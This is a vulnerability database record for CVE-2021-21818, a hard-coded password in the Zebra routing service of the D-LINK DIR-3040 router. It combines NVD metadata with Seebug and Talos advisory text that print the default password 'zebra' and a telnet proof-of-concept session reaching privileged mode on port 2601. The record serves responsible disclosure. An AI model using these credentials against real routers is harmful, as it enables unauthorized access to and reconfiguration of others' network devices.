A hard-coded password vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to a denial of service. An attacker can send a sequence of requests to trigger this vulnerability.
{"id": "CVE-2021-21818", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-21818", "description": "A hard-coded password vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to a denial of service. An attacker can send a sequence of requests to trigger this vulnerability.", "published": "2021-07-16T11:15:00", "modified": "2022-04-28T17:15:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21818", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2021-1283"], "cvelist": ["CVE-2021-21818"], "immutableFields": [], "lastseen": "2022-04-28T19:32:43", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "seebug", "idList": ["SSV:99311"]}, {"type": "talos", "idList": ["TALOS-2021-1283"]}], "rev": 4}, "score": {"value": 3.3, "vector": "NONE"}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/hasdid/status/1418054954867208194", "text": "/hashtag/SANSNewsBites?src=hashtag_click /hashtag/CyberSecurity?src=hashtag_click /hashtag/Automated?src=hashtag_click | DIR-3040 :: Rev. Ax :: FW v1.13B03 :: CVE-2021-21816 / CVE-2021-21817 / CVE-2021-21818 / CVE-2021-21819 / CVE-2021-21820 -Multiple Vulnerabilities https://t.co/ewq6PEwkfC?amp=1"}, {"link": "https://twitter.com/ehsantarrar1/status/1416950108382498816", "text": "D-LINK 1/2\nMultiple vulnerabilities (CVE-2021-21816, CVE-2021-21817, CVE-2021-21818, CVE-2021-21820) have been found in the D-LINK DIR-3040 wireless router. These vulnerabilities could allow an attacker to carry out a variety of malicious actions."}, {"link": "https://twitter.com/ehsantarrar1/status/1416950108382498816", "text": "D-LINK 1/2\nMultiple vulnerabilities (CVE-2021-21816, CVE-2021-21817, CVE-2021-21818, CVE-2021-21820) have been found in the D-LINK DIR-3040 wireless router. These vulnerabilities could allow an attacker to carry out a variety of malicious actions."}, {"link": "https://twitter.com/TWCERTCC/status/1419594535085117440", "text": "DIR-3040 :: Rev. Ax :: FW v1.13B03 :: CVE-2021-21816 / CVE-2021-21817 / CVE-2021-21818 / CVE-2021-21819 / CVE-2021-21820 -Multiple Vulnerabilities\nhttps://t.co/tLBw2PKBDc?amp=1\n------\n\u570b\u5167\u7db2\u8def\u7523\u54c1\u88fd\u9020\u5927\u5ee0\u4fee\u5fa9\u8def\u7531\u5668\u5bc6\u78bc\u786c\u7de8\u5beb\u66a8\u591a\u500bRCE\u56b4\u91cd\u6f0f\u6d1e\nview more\uff1ahttps://t.co/wqt7ryAayR?amp=1"}], "modified": "2021-07-23T07:50:01"}, "backreferences": {"references": [{"type": "seebug", "idList": ["SSV:99311"]}, {"type": "talos", "idList": ["TALOS-2021-1283"]}]}, "exploitation": null, "vulnersScore": 3.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "score": 7.5}}}, "cpe": ["cpe:/o:dlink:dir-3040_firmware:1.13b03"], "cpe23": ["cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*"], "cwe": ["CWE-798"], "affectedSoftware": [{"cpeName": "dlink:dir-3040_firmware", "version": "1.13b03", "operator": "eq", "name": "dlink dir-3040 firmware"}], "affectedConfiguration": [{"name": "dlink dir-3040", "cpeName": "dlink:dir-3040", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dlink:dir-3040:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1283", "name": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1283", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"seebug": [{"lastseen": "2021-07-24T08:24:55", "description": "The DIR-3040 is an AC3000-based wireless internet router.\n\nZebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols.\n\nThe DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password zebra:\n\n```\nadmin@dlinkrouter:~# cat /tmp/zebra.conf \nhostname Router\npassword zebra\nenable password zebra\n```\n\nExploit Proof of Concept\n\n```\n$ telnet 192.168.100.1 2601 \nTrying 192.168.100.1...\n Connected to 192.168.100.1.\n Escape character is '^]'.\n \n Hello, this is Quagga (version 1.1.1).\n Copyright 1996-2005 Kunihiro Ishiguro, et al.\n \n \n User Access Verification\n \n Password: \n Router> \n echo Echo a message back to the vty\n enable Turn on privileged mode command\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n Router> enable\n Password: \n Router# \n clear Clear stored data\n configure Configuration from vty interface\n copy Copy configuration\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n echo Echo a message back to the vty\n enable Turn on privileged mode command\n end End current mode and change to enable mode.\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n logmsg Send a message to enabled logging destinations\n no Negate a command or set its defaults\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n write Write running configuration to memory, network, or terminal\n```", "published": "2021-07-22T00:00:00", "type": "seebug", "title": "D-LINK DIR-3040 \u670d\u52a1\u7ec4\u4ef6\u4f7f\u7528\u9ed8\u8ba4\u5bc6\u7801\uff08CVE-2021-21818\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21818"], "modified": "2021-07-22T00:00:00", "id": "SSV:99311", "href": "https://www.seebug.org/vuldb/ssvid-99311", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": ""}], "talos": [{"lastseen": "2022-07-06T16:04:30", "description": "# Talos Vulnerability Report\n\n### TALOS-2021-1283\n\n## D-LINK DIR-3040 Syslog information disclosure vulnerability\n\n##### July 15, 2021\n\n##### CVE Number\n\nCVE-2021-21818\n\n## Summary\n\nA hard-coded password vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to a denial of service. An attacker can send a sequence of requests to trigger this vulnerability.\n\n### Tested Versions\n\nD-LINK DIR-3040 1.13B03\n\n### Product URLs\n\n<https://us.dlink.com/en/products/dir-3040-smart-ac3000-high-power-wi-fi-tri-band-gigabit-router>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-259 - Use of Hard-coded Password\n\n### Details\n\nThe DIR-3040 is an AC3000-based wireless internet router.\n\nZebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols.\n\nThe DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password `zebra`:\n \n \n admin@dlinkrouter:~# cat /tmp/zebra.conf \n hostname Router\n password zebra\n enable password zebra\n \n\n### Exploit Proof of Concept\n \n \n $ telnet 192.168.100.1 2601 \n Trying 192.168.100.1...\n Connected to 192.168.100.1.\n Escape character is '^]'.\n \n Hello, this is Quagga (version 1.1.1).\n Copyright 1996-2005 Kunihiro Ishiguro, et al.\n \n \n User Access Verification\n \n Password: \n Router> \n echo Echo a message back to the vty\n enable Turn on privileged mode command\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n Router> enable\n Password: \n Router# \n clear Clear stored data\n configure Configuration from vty interface\n copy Copy configuration\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n echo Echo a message back to the vty\n enable Turn on privileged mode command\n end End current mode and change to enable mode.\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n logmsg Send a message to enabled logging destinations\n no Negate a command or set its defaults\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n write Write running configuration to memory, network, or terminal\n \n\n### Timeline\n\n2021-04-28 - Vendor disclosure \n2021-05-12 - Vendor acknowledged \n2021-06-08 - Vendor provided patch for Talos to test \n2021-06-09 - Talos provided feedback on patch \n2021-06-23 - Talos follow up with vendor \n2021-07-13 - Vendor patched \n2021-07-15 - Public Release\n\n##### Credit\n\nDiscovered by Dave McDaniel of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2021-1345\n\nPrevious Report\n\nTALOS-2021-1274\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-15T00:00:00", "type": "talos", "title": "D-LINK DIR-3040 Syslog information disclosure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21818"], "modified": "2021-07-15T00:00:00", "id": "TALOS-2021-1283", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
CVE-2021-21818
